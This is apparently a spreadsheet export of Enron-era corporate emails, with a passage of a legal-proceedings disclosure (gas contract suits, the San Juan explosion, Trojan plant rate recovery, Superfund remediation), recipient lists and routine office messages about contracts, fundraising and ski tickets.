(Intratex), Houston Pipe Line Company and Panhandle Gas Company=20_x000D_
(collectively, the Enron Defendants), each of which is a wholly-owned=20_x000D_
subsidiary of Enron.  The Plaintiffs were either sellers or royalty owners=_x000D_
=20_x000D_
under numerous gas purchase contracts with Intratex, many of which have=20_x000D_
terminated.  Early in 1996, the case was severed by the Court into two=20_x000D_
matters to be tried (or otherwise resolved) separately.  In the first matte=_x000D_
r,=20_x000D_
the Plaintiffs alleged that the Enron Defendants committed fraud and=20_x000D_
negligent misrepresentation in connection with the =01&amp;Panhandle program,=_x000D_
=018 a=20_x000D_
special marketing program established in the early 1980s.  This case was=20_x000D_
tried in October 1996 and resulted in a verdict for the Enron Defendants.  =_x000D_
In=20_x000D_
the second matter, the Plaintiffs allege that the Enron Defendants violated=_x000D_
=20_x000D_
state regulatory requirements and certain gas purchase contracts by failing=_x000D_
=20_x000D_
to take the Plaintiffs=01, gas ratably with other producers=01, gas at cert=_x000D_
ain=20_x000D_
times between 1978 and 1988.  The trial court certified a class action with=_x000D_
=20_x000D_
respect to ratability claims.  On March 9, 2000, the Texas Supreme Court=20_x000D_
ruled that the trial court=01,s class certification was improper and remand=_x000D_
ed=20_x000D_
the case to the trial court.  The Enron Defendants deny the Plaintiffs=01,=_x000D_
=20_x000D_
claims and have asserted various affirmative defenses, including the statut=_x000D_
e=20_x000D_
of limitations.  The Enron Defendants believe that they have strong legal a=_x000D_
nd=20_x000D_
factual defenses, and intend to vigorously contest the claims.  Although no=_x000D_
=20_x000D_
assurances can be given, Enron believes that the ultimate resolution of the=_x000D_
se=20_x000D_
matters will not have a material adverse effect on its financial position o=_x000D_
r=20_x000D_
results of operations._x000D_
_x000D_
 On November 21, 1996, an explosion occurred in or around the Humberto Vida=_x000D_
l=20_x000D_
Building in San Juan, Puerto Rico.  The explosion resulted in fatalities,=_x000D_
=20_x000D_
bodily injuries and damage to the building and surrounding property.  San=_x000D_
=20_x000D_
Juan Gas Company, Inc. (San Juan Gas), an Enron affiliate, operated a=20_x000D_
propane/air distribution system in the vicinity, but did not provide servic=_x000D_
e=20_x000D_
to the building. Enron, San Juan Gas, four affiliates and their insurance=_x000D_
=20_x000D_
carriers were named as defendants, along with several third parties,=20_x000D_
including The Puerto Rico Aqueduct and Sewer Authority, Puerto Rico Telepho=_x000D_
ne=20_x000D_
Company, Heath Consultants Incorporated, Humberto Vidal, Inc. and their=20_x000D_
insurance carriers, in numerous lawsuits filed in U.S. District Court for t=_x000D_
he=20_x000D_
District of Puerto Rico and the Superior Court of Puerto Rico.  These suits=_x000D_
=20_x000D_
seek damages for wrongful death, personal injury, business interruption and=_x000D_
=20_x000D_
property damage allegedly caused by the explosion.  After nearly four years=_x000D_
=20_x000D_
without determining the cause of the explosion, all parties have agreed not=_x000D_
=20_x000D_
to litigate further that issue, but to move these suits toward settlements =_x000D_
or=20_x000D_
trials to determine whether each plaintiff was injured as a result of the=_x000D_
=20_x000D_
explosion and, if so, the lawful damages attributable to such injury. The=_x000D_
=20_x000D_
defendants have agreed on a fund for settlements or final awards. Numerous=_x000D_
=20_x000D_
suits have been settled and 20 cases have been set for trial in the federal=_x000D_
=20_x000D_
court beginning in February 2001. Although no assurances can be given, Enro=_x000D_
n=20_x000D_
believes that the ultimate resolution of these matters will not have a=20_x000D_
material adverse effect on its financial position or results of operations._x000D_
_x000D_
 Trojan Investment Recovery.  In early 1993, Portland General Electric=20_x000D_
Company (PGE) ceased commercial operation of the Trojan nuclear power=20_x000D_
generating facility (Trojan).  In April 1996 a circuit court judge in Mario=_x000D_
n=20_x000D_
County, Oregon, found that the Oregon Public Utility Commission (OPUC) coul=_x000D_
d=20_x000D_
not authorize PGE to collect a return on its undepreciated investment in=20_x000D_
Trojan, contradicting a November 1994 ruling from the same court.  The ruli=_x000D_
ng=20_x000D_
was the result of an appeal of PGE=01,s March 1995 general rate order which=_x000D_
=20_x000D_
granted PGE recovery of, and a return on, 87% of its remaining investment i=_x000D_
n=20_x000D_
Trojan.  The 1994 ruling was appealed to the Oregon Court of Appeals and wa=_x000D_
s=20_x000D_
stayed pending the appeal of the OPUC=01,s March 1995 order.  Both PGE and =_x000D_
the=20_x000D_
OPUC separately appealed the April 1996 ruling, which appeals were combined=_x000D_
=20_x000D_
with the appeal of the November 1994 ruling at the Oregon Court of Appeals.=_x000D_
 =20_x000D_
On June 24, 1998, the Court of Appeals of the State of Oregon ruled that th=_x000D_
e=20_x000D_
OPUC does not have the authority to allow PGE to recover a rate of return o=_x000D_
n=20_x000D_
its undepreciated investment in Trojan.  The court upheld the OPUC=01,s=20_x000D_
authorization of PGE=01,s recovery of its undepreciated investment in Troja=_x000D_
n._x000D_
_x000D_
 PGE and the OPUC each filed petitions for review with the Oregon Supreme=_x000D_
=20_x000D_
Court.  On August 26, 1998, the Utility Reform Project filed a petition for=_x000D_
=20_x000D_
review with the Oregon Supreme Court seeking review of that portion of the=_x000D_
=20_x000D_
Oregon Court of Appeals decision relating to PGE=01,s recovery of its=20_x000D_
undepreciated investment in Trojan.  On April 29, 1999, the Oregon Supreme=_x000D_
=20_x000D_
Court accepted the petitions for review.  On June 16, 1999, Oregon House Bi=_x000D_
ll=20_x000D_
3220 authorizing the OPUC to allow recovery of a return on the undepreciate=_x000D_
d=20_x000D_
investment in property retired from service was signed.  One of the effects=_x000D_
=20_x000D_
of the bill is to affirm retroactively the OPUC=01,s authority to allow PGE=_x000D_
=01,s=20_x000D_
recovery of a return on its undepreciated investment in Trojan._x000D_
_x000D_
 Relying on the new legislation, on July 2, 1999, PGE requested the Oregon=_x000D_
=20_x000D_
Supreme Court to vacate the June 24, 1998, adverse ruling of the Oregon Cou=_x000D_
rt=20_x000D_
of Appeals, affirm the validity of the OPUC=01,s order allowing PGE to reco=_x000D_
ver a=20_x000D_
return on its undepreciated investment in Trojan and to reverse its decisio=_x000D_
n=20_x000D_
accepting the Utility Reform Project=01,s petition for review.  The Utility=_x000D_
=20_x000D_
Reform Project and the Citizens Utility Board, another party to the=20_x000D_
proceeding, opposed such request and submitted to the Oregon Secretary of=_x000D_
=20_x000D_
State sufficient signatures in support of placing a referendum to negate th=_x000D_
e=20_x000D_
new legislation on the November 2000 ballot.  The Oregon Supreme Court has=_x000D_
=20_x000D_
indicated it will defer hearing the matter until after the November 2000=20_x000D_
elections.  Enron cannot predict the outcome of these actions.  Additionall=_x000D_
y,=20_x000D_
due to uncertainties in the regulatory process, management cannot predict,=_x000D_
=20_x000D_
with certainty, what ultimate rate-making action the OPUC will take regardi=_x000D_
ng=20_x000D_
PGE=01,s recovery of a rate of return on its Trojan investment.  Although n=_x000D_
o=20_x000D_
assurances can be given, Enron believes that the ultimate resolution of the=_x000D_
se=20_x000D_
matters will not have a material adverse effect on its financial position o=_x000D_
r=20_x000D_
results of operations._x000D_
_x000D_
 Environmental Matters.  Enron is subject to extensive federal, state and=_x000D_
=20_x000D_
local environmental laws and regulations.  These laws and regulations requi=_x000D_
re=20_x000D_
expenditures in connection with the construction of new facilities, the=20_x000D_
operation of existing facilities and for remediation at various operating=_x000D_
=20_x000D_
sites.  The implementation of the Clean Air Act Amendments is expected to=_x000D_
=20_x000D_
result in increased operating expenses.  These increased operating expenses=_x000D_
=20_x000D_
are not expected to have a material impact on Enron=01,s financial position=_x000D_
 or=20_x000D_
results of operations._x000D_
_x000D_
 The Environmental Protection Agency (EPA) has informed Enron that it is a=_x000D_
=20_x000D_
potentially responsible party at the Decorah Former Manufactured Gas Plant=_x000D_
=20_x000D_
Site (the Decorah Site) in Decorah, Iowa, pursuant to the provisions of the=_x000D_
=20_x000D_
Comprehensive Environmental Response, Compensation and Liability Act (CERCL=_x000D_
A,=20_x000D_
also commonly known as Superfund).  The manufactured gas plant in Decorah=_x000D_
=20_x000D_
ceased operations in 1951.  A predecessor company of Enron purchased the=20_x000D_
Decorah Site in 1963.  Enron=01,s predecessor did not operate the gas plant=_x000D_
 and=20_x000D_
sold the Decorah Site in 1965.  The EPA alleges that hazardous substances=_x000D_
=20_x000D_
were released to the environment during the period in which Enron=01,s=20_x000D_
predecessor owned the site, and that Enron=01,s predecessor assumed the=20_x000D_
liabilities of the company that operated the plant.  Enron contests these=_x000D_
=20_x000D_
allegations.  To date, the EPA has identified no other potentially=20_x000D_
responsible parties with respect to this site.  Under the terms of=20_x000D_
administrative orders, Enron replaced affected topsoil and removed impacted=_x000D_
=20_x000D_
subsurface soils in certain areas of the tract where the plant was formerly=_x000D_
=20_x000D_
located.  Enron completed the final removal actions at the site in November=_x000D_
=20_x000D_
1998 and concluded all remaining site activities in the spring of 1999. =20_x000D_
Enron submitted a final report on the work conducted at the site to the EPA=_x000D_
. =20_x000D_
Enron does not expect to incur any additional expenditures in connection wi=_x000D_
th=20_x000D_
this site._x000D_
_x000D_
 Enron=01,s natural gas pipeline companies conduct soil and groundwater=20_x000D_
remediation on a number of their facilities.  Enron does not expect to incu=_x000D_
r=20_x000D_
material expenditures in connection with soil and groundwater remediation._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>frozenset({'lisa.burnett@enron.com', 'paul.choi@enron.com', 'miguel.garcia@enron.com', 'rogers.herndon@enron.com', 'janice.moore@enron.com', 'kimberly.allen@enron.com', 'diana.allen@enron.com', 'alton.jackson@enron.com', 'chad.starnes@enron.com', 'genia.fitzgerald@enron.com', 'jeffrey.miller@enron.com', 'keith.comeaux@enron.com', 'smith.day@enron.com', 'rhonda.robinson@enron.com', 'dean.laurent@enron.com', 'tom.moran@enron.com', 'jeff.richter@enron.com', 'cyril.price@enron.com', 'amy.horton@enron.com', 'anna.santucci@enron.com', 'michael.driscoll@enron.com', 'laura.jones@enron.com', 'kyle.schultz@enron.com', 'joe.quenet@enron.com', 'jan.king@enron.com', 'cara.semperger@enron.com', 'john.malowney@enron.com', 'debbie.brackett@enron.com', 'russell.kelley@enron.com', 'mark.guzman@enron.com', 'maria.valdes@enron.com', 'george.hopley@enron.com', 'paul.mead@enron.com', 'stephanie.piwetz@enron.com', 'joe.errigo@enron.com', 'joseph.wagner@enron.com', 'robert.benson@enron.com', 'kimberly.hundl@enron.com', 'paul.thomas@enron.com', 'd.hunsucker@enron.com', 'jeff.king@enron.com', 'kate.symes@enron.com', 'justin.laverell@enron.com', 'william.bradford@enron.com', 'stewart.rosman@enron.com', 'jesse.bryson@enron.com', 'karla.compean@enron.com', 'edward.baughman@enron.com', 'sharen.cason@enron.com', 'jason.crawford@enron.com', 'tanya.rohauer@enron.com', 'ricardo.perez@enron.com', 'eric.saibi@enron.com', 'kim.theriot@enron.com', 'doug.gilbert-smith@enron.com', 'russell.diamond@enron.com', 'michael.kelly@enron.com', 'michael.etringer@enron.com', 'terri.clynes@enron.com', 'chris.lenartowicz@enron.com', 'janet.moore@enron.com', 'david.fairley@enron.com', 'gerald.gilbert@enron.com', 'joseph.piotrowski@enron.com', 'james.terrell@enron.com', 'bill.rust@enron.com', 'fran.chang@enron.com', 'greg.trefz@enron.com', 'john.suttle@enron.com', 'veronica.gonzalez@enron.com', 'john.forney@enron.com', 'chris.foster@enron.com', 'stanley.cocke@enron.com', 'larry.jester@enron.com', 'clint.dean@enron.com', 'david.ryan@enron.com', 'sean.crandall@enron.com', 'john.kinser@enron.com', 'don.baughman@enron.com', 'david.portz@enron.com', 'karen.lambert@enron.com', 'jon.lewis@enron.com', 'erik.serio@enron.com', 'kevin.presto@enron.com', 'leslie.hansen@enron.com', 'mitzie.scott@enron.com', 'kim.ward@enron.com', 'christian.yoder@enron.com', 'tim.belden@enron.com', 'dana.davis@enron.com', 'melissa.murphy@enron.com', 'john.suarez@enron.com', 'wendy.conwell@enron.com', 'corry.bentley@enron.com', 'jeffrey.hodge@enron.com', 'stacey.white@enron.com', 'andy.pace@enron.com', 'andrea.dahlke@enron.com', 'rika.imai@enron.com', 'christopher.watts@enron.com', 'rod.nelson@enron.com', 'kevin.cline@enron.com', 'lawrence.clayton@enron.com', 'juan.padron@enron.com', 'janelle.scheuer@enron.com', 'ted.ballinger@enron.com', 'thresa.allen@enron.com', 'kayne.coulter@enron.com', 'doug.miller@enron.com', 'casey.evans@enron.com', 'jason.choate@enron.com', 'elsie.lew@enron.com', 'gary.justice@enron.com', 'larry.campbell@enron.com', 'todd.decook@enron.com', 'jenny.latham@enron.com', 'tom.may@enron.com', 'rudy.acevedo@enron.com', 'kim.durham@enron.com', 'jay.wills@enron.com', 'paul.broderick@enron.com', 'madhup.kumar@enron.com', 'phillip.platter@enron.com', 'mike.curry@enron.com', 'keller.mayeaux@enron.com', 'steve.olinde@enron.com', 'mike.carson@enron.com', 'brent.hebert@enron.com', 'monica.lande@enron.com', 'christopher.smith@enron.com', 'valarie.sabo@enron.com', 'tracy.ngo@enron.com', 'christi.nicolay@enron.com', 'robert.stalford@enron.com', 'george.diaz@enron.com', 'joy.werner@enron.com', 'doug.sewell@enron.com', 'joe.gordon@enron.com', 'george.wood@enron.com', 'grace.kim@enron.com', 'dave.mangskau@enron.com', 'donald.vinson@enron.com', 'lisa.lees@enron.com', 'joe.stepenovitch@enron.com', 'robert.badeer@enron.com', 'mary.hain@enron.com', 'brant.reves@enron.com', 'oscar.dalton@enron.com', 'jim.homco@enron.com', 'zachary.sampson@enron.com', 'lloyd.will@enron.com', 'gretchen.lotz@enron.com', 'elizabeth.sager@enron.com', 'larry.valderrama@enron.com', 'edward.sacks@enron.com', 'narsimha.misra@enron.com', 'matt.lorenz@enron.com', 'holli.krebs@enron.com', 'posey.martinez@enron.com', 'mike.swerzbin@enron.com', 'tom.dutta@enron.com', 'wayne.herndon@enron.com', 'peter.makkai@enron.com', 'shari.stack@enron.com', 'juan.hernandez@enron.com', 'richard.hrabal@enron.com', 'carla.hoffman@enron.com', 'alex.wong@enron.com', 'diana.scholtes@enron.com', 'mark.symms@enron.com', 'leslie.reeves@enron.com', 'audrey.cook@enron.com'})</t>
  </si>
  <si>
    <t>FirstEnergy Trading Services, Inc.</t>
  </si>
  <si>
    <t xml:space="preserve">FirstEnergy Trading Services, Inc. merged into FirstEnergy Services Corp. _x000D_
(Services) effective 12/31/2000.  Notice has been given that they are _x000D_
assigning the Master Energy Purchase and Sale Agreement to Services.  </t>
  </si>
  <si>
    <t>Mon, 18 Sep 2000 07:02:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>contracts</t>
  </si>
  <si>
    <t xml:space="preserve">Susan,_x000D_
_x000D_
I need to take a look at the following contracts.  Will you please have _x000D_
someone run them down_x000D_
to me in Central Gas Trading when you get a chance?_x000D_
_x000D_
Counterparty   Sitara  Global # Synergi #_x000D_
_x000D_
AEC Marketing USA  249169  96017703 016-01611-01-002 _x000D_
Crestar    249175  96022399 016-20948-301_x000D_
Star Natural Gas  249312  96042209_x000D_
Kaztex Energy Mgmt  393061  96000734 016-48012-302_x000D_
BP Amoco   381839  96044917_x000D_
Utilicorp   263333  96033084_x000D_
Wisconsin Power &amp; Light 363412  96045390_x000D_
Amoco Energy Trading  391154  96041011_x000D_
Tenaska Marketing Ventures 387768  96001395 016-87283-01-002 _x000D_
_x000D_
My cube # is 3234D and my extension is x3-6320._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kevin  </t>
  </si>
  <si>
    <t>Wed, 20 Jun 2001 14:25:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'louise.kitchen@enron.com', 'john.lavorato@enron.com', 'david.oxley@enron.com'})</t>
  </si>
  <si>
    <t>Scott Gilbert Contract</t>
  </si>
  <si>
    <t>I think it's in John's court.  Please advise as to whether it will be approved or needs to be changed.  It's been hanging out there for about a week.  Thanks.</t>
  </si>
  <si>
    <t>Mon, 11 Dec 2000 08:11:00 -0800 (PST)</t>
  </si>
  <si>
    <t>ANP Marketing Company</t>
  </si>
  <si>
    <t xml:space="preserve">----- Forwarded by Leslie Hansen/HOU/ECT on 12/11/2000 04:11 PM -----_x000D_
_x000D_
	Leslie Hansen_x000D_
	12/04/2000 12:31 PM_x000D_
		 _x000D_
		 To: Stephanie Sever/HOU/ECT@ECT, Lisa Lees/HOU/ECT@ECT_x000D_
		 cc: JMansfield@anpower.com, Rhonda L Denton/HOU/ECT@ECT_x000D_
		 Subject: ANP Marketing Company_x000D_
_x000D_
Please open ANP Marketing Company up to trade US power pursuant to the _x000D_
on-line GTCs, pending credit approval.  As we discussed, if credit has not _x000D_
yet approved this counterparty for on-line trading, please let Jeff Mansfield _x000D_
of ANP know and give him a credit contact._x000D_
_x000D_
Thanks so much,_x000D_
_x000D_
Leslie </t>
  </si>
  <si>
    <t>Mon, 21 May 2001 04:58:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Why are you sending this to me?  Shouldn't it have been the GISB which you _x000D_
are modifying as we discussed Friday?_x000D_
_x000D_
_x000D_
_x000D_
	Debra Perlingiere_x000D_
	05/21/2001 09:50 AM_x000D_
		 _x000D_
		 To: Dan J Hyvl/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Oglethorpe_x000D_
_x000D_
     _x000D_
_x000D_
_x000D_
Debra Perlingiere_x000D_
Enron North America Corp._x000D_
Legal Department_x000D_
1400 Smith Street, EB 3885_x000D_
Houston, Texas 77002_x000D_
dperlin@enron.com_x000D_
Phone 713-853-7658_x000D_
Fax  713-646-3490_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 21 Nov 2000 06:10:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'mark.thorne@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'regina.blackshear@enron.com', 'angela.barnett@enron.com', 'angela.gill@enron.com', 'leslie.smith@enron.com', 'eve.puckett@enron.com', 'diane.salcido@enron.com', 'judy.walters@enron.com', 'sharon.peace@enron.com', 'george.smith@enron.com', 'lois.ford@enron.com', 'judy.hernandez@enron.com'})</t>
  </si>
  <si>
    <t>Requests for Time Off</t>
  </si>
  <si>
    <t>You must have any requests for time off approved by either myself or Brenna.  _x000D_
The sheet  that circulates from Sandy indicating days off during a particular _x000D_
month reflects approved days off - these days must be approved first before _x000D_
marking on this sheet.  If you have further questions please ask me or Brenna</t>
  </si>
  <si>
    <t>Wed, 10 Oct 2001 19:53:58 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'frank.ermis@enron.com', 'tori.kuykendall@enron.com', 'jay.reitmeyer@enron.com', 'matthew.lenhart@enron.com', 'keith.holst@enron.com'})</t>
  </si>
  <si>
    <t>Increasing EOL liquidity in West Basis</t>
  </si>
  <si>
    <t>I would like to set up a brief meeting in the afternoon this week or next, to discuss increasing the liquidity in west basis on EOL.  It would be helpful for our desk to sit down with John Arnold and John Lavorato to openly discuss the importance of continuing to increase liquidity on EOL._x000D_
 _x000D_
I would also like to put to rest the notion that increasing liquidity leads to negative P&amp;L and that a Trader's support of EOL liquidity will go unrecognized at year end PRC._x000D_
 _x000D_
Please email me with a response of when we could set up such a meeting._x000D_
 _x000D_
Sincerely,_x000D_
Mike Grigsby</t>
  </si>
  <si>
    <t>Tue, 5 Jun 2001 08:05:13 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'sherry.anastas@enron.com'})</t>
  </si>
  <si>
    <t>Extend Deal</t>
  </si>
  <si>
    <t xml:space="preserve">Chris,_x000D_
_x000D_
Hey, Scott is out of the office, so I'm sending this to you._x000D_
_x000D_
By the way, I didn't know you were a STAR!!!  I caught you on Nightline last night.  You were right up there with Ken Lay._x000D_
_x000D_
Sherry_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Sherry Anastas/HOU/ECT on 06/05/2001 10:03 AM ---------------------------_x000D_
_x000D_
_x000D_
Sherry Anastas_x000D_
06/05/2001 10:02 AM_x000D_
To:	Scott Goodell/Enron@EnronXGate_x000D_
cc:	 _x000D_
Subject:	Extend Deal_x000D_
_x000D_
I guess it helps to attach the deal._x000D_
_x000D_
_x000D_
---------------------- Forwarded by Sherry Anastas/HOU/ECT on 06/05/2001 10:02 AM ---------------------------_x000D_
_x000D_
_x000D_
Sherry Anastas_x000D_
06/05/2001 10:02 AM_x000D_
To:	Scott Goodell/Enron@EnronXGate_x000D_
cc:	 _x000D_
Subject:	Extend Deal_x000D_
_x000D_
Scott,_x000D_
_x000D_
Can you extend the following deal to 3/31/00?  This contract had a small amount of activity for 2/00 and 3/00._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Sherry_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 1 May 2001 05:34:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'judy.timson@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'brenda_brown@pgn.com', 'nancy_miller@pgn.com', 'kara.ausenhus@enron.com', 'pat_dewyse@pgn.com', 'susan.moore@enron.com', 'pat_simon@pgn.com', 'cynthia.collett@enron.com', 'di.mu@enron.com', 'michael.tully@enron.com', 'lysa.akin@enron.com', 'shari_johnson@pgn.com', 'paul.kaufman@enron.com', 'jeff.richter@enron.com', 'mollie.gustafson@enron.com', 'cassia_look@pgn.com', 'linda_stennick@pgn.com', 'dave_pitzer@pgn.com', 'jim_haney@pgn.com', 'barbara_schwartz@pgn.com', 'cara.semperger@enron.com', 'john.malowney@enron.com', 'chris.lackey@enron.com', 'tncstub@aol.com', 'crystal.hyde@enron.com', 'elena_smith@pgn.com', 'jennifer_wyatt@pgn.com', 'sharon@northwest.com', 'cstubblefield@ymca-portland.org', 'kate.symes@enron.com', 'laura.wente@enron.com', 'kimberly_hamling@pgn.com', 'julie.kearney@enron.com', 'pfielder@oakwood.com', 'mike_coles@pgn.com', 'heather.dunton@enron.com', 'heidi.gutwald@enron.com', 'michael.etringer@enron.com', 'dore_judd@pgn.com', 'brandy_miller@pgn.com', 'jessica.nevin@enron.com', 'sandra_hernandez@pgn.com', 'fran.chang@enron.com', 'tim_shibahara@pgn.com', 'jeri_petrella@pgn.com', 'fredrik.eriksson@enron.com', 'annamarie.reed@enron.com', 'carmen_milashouskas@pgn.com', 'linda.strahm@enron.com', 'julia_taylor@pgn.com', 'sean.crandall@enron.com', 'russ.matzner@enron.com', 'rich.nevin@enron.com', 'donald_silverthorne@credence.com', 'sandi_michaelis@pgn.com', 'angela.cadena@enron.com', 'kourtney.nelson@enron.com', 'atha_brown@pgn.com', 'jayne_allen@pgn.com', 'lhalsey@oakwood.com', 'tim.belden@enron.com', 'csacora@shelter-products.com', 'mike_schwartz@pgn.com', 'patrick.tucker@enron.com', 'tami_clifford@pgn.com', 'stan.gray@enron.com', 'mindy.hart@enron.com', 'sally_johnson@pgn.com', 'laflower@yahoo.com', 'joan_amero@pgn.com', 'anna.mehrer@enron.com', 'donna.lombardo@marriott.com', 'penni_mellon@pgn.com', 'jennifer.hurd@enron.com', 'janie_johnson@pgn.com', 'wkoop@oakwood.com', 'sandra_wolicki@pgn.com', 'glenn.surowiec@enron.com', 'jackie_dornfeld@pgn.com', 'phillip.platter@enron.com', 'diana.willigerod@enron.com', 'mary_miller@pgn.com', 'grace.rodriguez@enron.com', 'tracy.ngo@enron.com', 'colleen.case@enron.com', 'kent_moore@pgn.com', 'rdixon@hevanet.com', 'scott_bither@pgn.com', 'jessica.burry@enron.com', 'christy_nyquist@pgn.com', 'mary_callahan@pgn.com', 'holly.strong@enron.com', 'julie.young@enron.com', 'roger_synowski@pgn.com', 'linda_bodine@pgn.com', 'bill.williams@enron.com', 'holli.krebs@enron.com', 'dawn_wilde@pgn.com', 'sue.baxter@enron.com', 'donna.johnson@enron.com', 'carla.hoffman@enron.com', 'chicamorgan@hotmail.com', 'diana.scholtes@enron.com', 'marlea_barnes@pgn.com', 'greg_concannon@pgn.com', 'krista.ausenhus@enron.com', 'eleanor@spiretech.com'})</t>
  </si>
  <si>
    <t>Oregon MS Walk Results Are In.....</t>
  </si>
  <si>
    <t xml:space="preserve">Congratulations, Anna Mehrer from ENA, who successfully raised over $600 fo=_x000D_
r=20_x000D_
the MS Walk.  Her success results in winning the TEAM ENRON grand prize of=_x000D_
=20_x000D_
two round-trip tickets on Continental Airlines.  There were several TEAM=20_x000D_
ENRON walkers that raised over $300 - many thanks for ALL of your efforts!_x000D_
_x000D_
Preliminary numbers are showing Oregon's MS Walk raised over $400,000 to he=_x000D_
lp=20_x000D_
find a cause and cure for multiple sclerosis.  Part of that success is due =_x000D_
to=20_x000D_
TEAM ENRON=01,S effort; the Oregon MS headquarters reports these TEAM ENRON=_x000D_
=20_x000D_
results:=20_x000D_
_x000D_
?       156 TEAM ENRON walkers registered (EBS, ENA, PGE + friends/family)_x000D_
? $ 7,092 TEAM ENRON dollars turned in by 4/30/01(approximately 100 pledges=_x000D_
=20_x000D_
turned in)=20_x000D_
? $ 4,525 TEAM ENRON dollars that are being matched by Enron Corp_x000D_
? $    500  PGE is awarding MS Society as an Employee Volunteer Grant_x000D_
? $ 2,500  Enron's Volunteer Incentive Program donation on behalf of EBS=20_x000D_
Walkers_x000D_
? $ 2,500  Enron's Volunteer Incentive Program donation on behalf of ENA=20_x000D_
Walkers_x000D_
? $15,000 Enron's Sponsorship of this Event=20_x000D_
_x000D_
TOTAL TEAM ENRON RAISED TO DATE:   $32,117_x000D_
_x000D_
These preliminary numbers should increase once all TEAM ENRON pledges have=_x000D_
=20_x000D_
been turned in; approximately 50 TEAM ENRON pledges are outstanding.   Plea=_x000D_
se=20_x000D_
turn in your pledges by May 25 to the MS office at the following address:_x000D_
_x000D_
   National MS Society_x000D_
   Portland Chapter_x000D_
   1650 NW Naito Parkway_x000D_
   Suite 190_x000D_
   Portland, OR  97209_x000D_
   (Phone:  503/223-9511)_x000D_
_x000D_
If you have any questions regarding your pledges, please contact Judy Timso=_x000D_
n,=20_x000D_
503/886-0501._x000D_
_x000D_
Thank you for making a difference and rising to the challenge!!!_x000D_
_x000D_
=20_x000D_
_x000D_
_x000D_
Judy Timson_x000D_
Project Manager Specialist=20_x000D_
Enron Broadband Services_x000D_
2100 SW River Parkway_x000D_
Portland, Oregon 97201_x000D_
Office: 503-886-0501_x000D_
FAX:  503-886-0102=20_x000D_
</t>
  </si>
  <si>
    <t>Wed, 25 Oct 2000 05:56:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'birdsey@haas.berkeley.edu'})</t>
  </si>
  <si>
    <t>RE: Friday is the last day for purchasing Discount Ski Tickets!!!_x000D_
 !!</t>
  </si>
  <si>
    <t>Hi Will,_x000D_
_x000D_
Thanks for e-mail!!_x000D_
_x000D_
Is there anyway I can tell you how many tickets I need and leave a check in_x000D_
your box on Monday or mail it to you today.  I had a mid-term last night and_x000D_
forgot to bring my check book and won't be back on campus until Monday._x000D_
_x000D_
Let me know what would be easier for you!_x000D_
_x000D_
thanks,_x000D_
Jackie_x000D_
Eve99_x000D_
_x000D_
-----Original Message-----_x000D_
From: Will C Birdsey [mailto:birdsey@haas.berkeley.edu]_x000D_
Sent: Wednesday, October 25, 2000 11:08 AM_x000D_
To: mba01@haas.berkeley.edu; mba02@haas.berkeley.edu;_x000D_
eveningmba@haas.berkeley.edu; undergrd@haas.berkeley.edu_x000D_
Subject: Friday is the last day for purchasing Discount Ski Tickets!!!!!_x000D_
_x000D_
_x000D_
Just a quick reminder, Friday is the last day to purchase your discount ski_x000D_
tickets.  We need to buy 50 to make this thing happen.  Please get your_x000D_
checks in ASAP.  Thanks_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Redwoods@Haas is organizing discounted ski tickets at Squaw Valley and_x000D_
Alpine Meadows._x000D_
_x000D_
This is a great way to save some money if you plan on skiing this year._x000D_
Both Squaw and Alpine are PREMIERE North Lake Tahoe ski resorts._x000D_
_x000D_
Squaw Valley Tickets cost $45 each and include night skiing. (Regular Price_x000D_
$54)_x000D_
Make checks payable to Will Birdsey and leave them in my MBA02 mailbox._x000D_
Deadline Friday, October 27th!_x000D_
_x000D_
Alpine Meadows Tickets cost $42 each.  (Regular Price $52)_x000D_
Make checks payable to Matt Hawe and leave them in his MBA02 mailbox._x000D_
Deadline Friday, October 27th!_x000D_
_x000D_
* Tickets are good all ski season (including holidays and weekends)_x000D_
_x000D_
* Tickets are transferrable_x000D_
_x000D_
* Buy as many (or as few) tickets as you want_x000D_
_x000D_
See you on the slopes!</t>
  </si>
  <si>
    <t>Tue, 29 May 2001 08:59:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'greg.mcmahon@enron.com'})</t>
  </si>
  <si>
    <t>FW: Government Affairs budget meeting information</t>
  </si>
  <si>
    <t>Rick , please see attached_x000D_
_x000D_
greg_x000D_
 -----Original Message-----_x000D_
From:  McMahon, Greg  _x000D_
Sent: 29 May 2001 15:22_x000D_
To: Glen, Merle; Dernehl, Ginger_x000D_
Subject: Government Affairs budget meeting information _x000D_
_x000D_
Ginger &amp; Merle,_x000D_
_x000D_
Please find copies for todays Governement Affairs review Meeting. (please _x000D_
forward to Rick and the group)_x000D_
_x000D_
All fiigures in USD_x000D_
_x000D_
_x000D_
thanks_x000D_
Greg</t>
  </si>
  <si>
    <t>Wed, 10 Oct 2001 18:18:05 -0700 (PDT)</t>
  </si>
  <si>
    <t>PRESS RELEASE</t>
  </si>
  <si>
    <t xml:space="preserve">Your help in announcing this unique new product would be_x000D_
greatly appreciated.     John_x000D_
_x000D_
"PGS Energy Training Announces Breakthrough New Training_x000D_
Product for Energy Derivatives and Electricity Trading."_x000D_
_x000D_
FOR IMMEDIATE RELEASE_x000D_
_x000D_
 John Adamiak_x000D_
PGS Energy Training_x000D_
412-279-9298_x000D_
www.seminars-on-demand.com_x000D_
john@pgsenergy.com_x000D_
_x000D_
 Pittsburgh, Pennsylvania - October 10, 2001 - PGS Energy Training_x000D_
announced today the official release of its innovative new training product_x000D_
